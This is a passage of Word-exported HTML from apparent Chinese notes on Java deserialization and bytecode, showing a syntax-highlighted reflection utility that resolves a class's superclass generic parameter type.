style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(!(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">params</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">index</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">instanceof</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">))</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> params</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">index</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">];</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                

                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">通过反射,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">获得</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Class </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">定义中声明的父类的泛型参数类型</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">如:</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> public EmployeeDao extends BaseDao</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">        <Employee< span>
        </Employee<></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ErrorTok';color: #FF0000;font-weight: bold;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ErrorTok';color: #FF0000;font-weight: bold;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">                  <t></t></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param clazz</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@SuppressWarnings</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"unchecked"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">T</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">T</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSuperGenericType</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> clazz</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSuperClassGenricType</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">clazz</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">循环向上转型,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: 